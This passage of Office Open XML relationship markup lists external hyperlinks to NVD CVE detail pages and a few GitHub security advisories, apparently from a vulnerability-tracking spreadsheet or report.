/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17047" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17628" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19273" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40635" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78415" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7884" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84397" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87025" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87033" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87037" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87048" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89031" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91021" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92132" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92133" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92579" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92590" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92778" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10556" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11984" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16188" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18065" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19607" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19668" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20121" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57581" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59823" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61709" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73443" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73477" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73478" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75029" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76433" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76439" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76444" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76447" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80225" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81165" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81166" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81176" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81205" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82775" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82778" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82782" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82785" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84501" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84533" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84906" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85104" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85196" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85501" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86118" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86174" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86475" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86755" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86756" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86760" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86761" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86767" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86768" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86773" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87028" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88932" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89020" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89030" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90527" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90941" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92216" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92356" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92361" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92461" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92475" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92565" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92568" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92803" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9338" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19280" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2380" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61453" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61597" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81566" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81869" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82764" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82773" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82776" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82781" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82788" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82795" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82796" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84701" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85125" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86763" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86772" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90563" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90568" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90893" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90957" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91099" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91101" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91103" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92213" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-373m-p57p-8665" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10542" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55244" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61910" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79723" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80434" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92587" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19729" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20072" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20235" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20282" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76426" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76427" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76428" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76431" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76432" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76434" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76446" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76448" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76449" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76450" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76451" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89298" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92813" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16189" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19857" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78546" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79943" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82763" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82767" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82769" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82771" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82790" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82792" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86889" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90570" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90781" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92298" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4wj4-79rr-pvff" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13277" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19619" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20350" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43690" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75025" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80176" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84492" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84550" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84630" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85732" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92221" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76151" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86890" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90955" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92627" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-36591" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45767" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63225" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65383" 